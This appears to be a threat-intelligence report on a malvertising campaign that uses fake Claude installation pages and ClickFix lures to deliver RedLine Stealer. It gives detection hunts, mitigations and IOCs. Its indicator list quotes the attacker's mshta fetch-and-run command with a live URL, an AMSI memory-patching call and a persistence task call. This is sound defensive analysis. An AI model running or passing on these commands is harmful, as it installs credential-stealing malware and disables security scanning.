InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise

What Happened

Cybercriminals are running fake Google Ads that pretend to be installation guides for Anthropic's Claude AI assistant. Anyone searching for Claude AI, including developers and general users on Windows and macOS, is at risk of clicking these malicious links. This matters because the fake websites trick users into copying and pasting a command that secretly installs malware designed to steal sensitive data and passwords. To stay safe, users should only download software directly from official vendor websites and never copy-paste installation commands from unverified sources.

Key Takeaways

• The InstallFix campaign uses malicious Google Ads to promote fake Claude AI installation pages.
• Attackers utilize the 'ClickFix' social engineering tactic, tricking users into copying and executing malicious MSHTA or curl commands.
• The infection chain uses a ZIP/HTA polyglot file to bypass static analysis and execute VBScript silently via COM objects.
• Advanced evasion techniques include AMSI memory patching, SSL certificate validation bypass, and victim-unique C2 subdomains.
• The final payload is executed filelessly in memory and is associated with RedLine Stealer.

Affected Systems

• Windows
• macOS

Attack Chain

The attack begins with malvertising on Google Ads, directing users searching for Claude AI to a fake installation page. The page uses a 'ClickFix' lure, instructing users to copy and paste an MSHTA command into their terminal. This command downloads a ZIP/HTA polyglot file (claude.msixbundle) which executes embedded VBScript silently via a COM object. The VBScript reconstructs an obfuscated PowerShell command that bypasses AMSI and SSL validation, generates a unique victim ID, and fetches a final fileless payload (RedLine Stealer) from a remote C2 server, while establishing persistence via scheduled tasks.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: Yes
• Platforms: TrendAI Vision One

The article provides proprietary TrendAI Vision One XDR search queries to hunt for MSHTA spawning shells and encoded PowerShell executions.

Detection Engineering Assessment

EDR Visibility: High — The attack relies heavily on process creation (mshta spawning cmd/powershell), command-line arguments, and PowerShell execution, all of which are highly visible to modern EDR solutions with AMSI integration. Network Visibility: Medium — While the initial payload download is visible, the C2 communication uses HTTPS and victim-unique subdomains, making static network IOC blocking less effective. Detection Difficulty: Moderate — The heavy use of obfuscation, variable splitting, and fileless execution complicates static analysis, but the initial MSHTA execution and process ancestry are strong, reliable behavioral indicators.

Required Log Sources

• Process Creation (Event ID 4688 / Sysmon 1)
• PowerShell Operational (Event ID 4104)
• Network Connections (Sysmon 3)
• Scheduled Task Creation (Event ID 4698)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for mshta.exe executing with command-line arguments containing remote URLs, especially those ending in unusual extensions like .msixbundle or .zip.	Process Creation	Execution	Low
Identify instances where mshta.exe spawns command shells (cmd.exe, powershell.exe, wscript.exe) as child processes.	Process Creation	Execution	Low
Detect cmd.exe executing with delayed variable expansion (/v:on) combined with variable splitting techniques (e.g., set x=pow) to reconstruct script interpreters.	Process Creation	Defense Evasion	Medium
Monitor PowerShell script block logs for memory patching API calls, specifically [Runtime.InteropServices.Marshal]::WriteInt32 targeting AMSI contexts.	PowerShell Operational Logs	Defense Evasion	Low

Control Gaps

• Standard web filtering may miss newly registered malvertising domains.
• Static AV may fail to flag the ZIP/HTA polyglot due to the presence of valid Microsoft signatures on the embedded archive files.

Key Behavioral Indicators

• mshta.exe spawning cmd.exe or powershell.exe
• cmd.exe using /v:on and variable splitting to launch PowerShell
• PowerShell executing with -E or -EncodedCommand immediately after a suspicious parent process
• Creation of scheduled tasks with randomized or suspicious names (e.g., 'servicehmb') executing script interpreters

False Positive Assessment

• Low. The combination of MSHTA fetching remote payloads, spawning command shells, and executing obfuscated PowerShell with AMSI bypasses is highly indicative of malicious intent and rarely seen in legitimate administrative activity.

Recommendations

Immediate Mitigation

• Block access to the identified malicious domains and IP addresses at the firewall or secure web gateway.
• Terminate any active mshta.exe processes exhibiting suspicious child process spawning or remote network connections.

Infrastructure Hardening

• Restrict or completely disable the execution of legacy scripting tools like mshta.exe, wscript.exe, and cscript.exe via AppLocker or WDAC if not required for business operations.
• Ensure endpoint protection solutions are configured to block, not just alert on, suspicious script interpreter behavior.

User Protection

• Deploy DNS filtering to prevent users from reaching newly registered or suspicious domains associated with malvertising.
• Ensure EDR agents are actively monitoring and blocking AMSI bypass attempts.

Security Awareness

• Educate employees on the risks of copying and pasting installation commands from unverified websites (ClickFix attacks).
• Train users to be highly skeptical of sponsored search results and to navigate directly to official vendor websites for software downloads.

MITRE ATT&CK Mapping

• T1566.002 - Phishing: Spearphishing Link
• T1583.008 - Acquire Infrastructure: Malvertising
• T1218.005 - System Binary Proxy Execution: Mshta
• T1559.001 - Inter-Process Communication: Component Object Model
• T1059.005 - Command and Scripting Interpreter: Visual Basic
• T1027 - Obfuscated Files or Information
• T1059.001 - Command and Scripting Interpreter: PowerShell
• T1562 - Impair Defenses
• T1053.005 - Scheduled Task/Job: Scheduled Task

Additional IOCs

• Ips:
  • 104[.]21[.]0[.]95 - Outbound connection IP observed during dynamic analysis.
  • 185[.]177[.]239[.]255 - Outbound connection IP observed during dynamic analysis.
• Domains:
  • claude-code-app[.]gitlab[.]io - Fake Claude AI installation landing page hosted on GitLab Pages.
  • download[.]version-516[.]com - Alternative payload delivery domain observed in telemetry images.
  • hosted-by[.]yeezyhost[.]net - Domain associated with RedLine Stealer infrastructure and the identified IP addresses.
• Urls:
  • hxxps://download[.]version-516[.]com/other - Alternative payload URL observed in scheduled task persistence mechanisms.
• File Hashes:
  • 811fbf0ff6b6acabe4b545e493ec0dd0178a0302 (SHA1) - Hash of the recovered Stage 5 payload file.
  • 2f04ba77bb841111036b979fc0dab7fcbae99749718ae1dd6fd348d4495b5f74 (SHA256) - Hash of the recovered Stage 5 payload file.
• File Paths:
  • claude.msixbundle - Filename of the ZIP/HTA polyglot downloaded by the initial MSHTA command.
• Command Lines:
  • Purpose: Initial access lure tricking users into downloading and executing the remote HTA payload. | Tools: mshta.exe | Stage: Initial Access | mshta https://download-version.1-5-8.com/claude.msixbundle
  • Purpose: Reconstructs the 'powershell' string to evade static detection and executes a base64-encoded stager. | Tools: cmd.exe, powershell.exe | Stage: Execution
  • Purpose: Patches the AMSI context in memory to blind security products for the remainder of the session. | Tools: powershell.exe | Stage: Defense Evasion | [Runtime.InteropServices.Marshal]::WriteInt32(<amsiContext>, 0x41414141)
  • Purpose: Creates a scheduled task for persistence to ensure the malware runs automatically. | Tools: VBScript, Task Scheduler | Stage: Persistence | RegisterTaskDefinition("servicehmb", ProcessInstitution, 6, , , 3)
• Other:
  • servicehmb - Name of the scheduled task created for persistence.
  • AMSI_RESULT_NOT_DETECTED - String used as an XOR key for payload deobfuscation.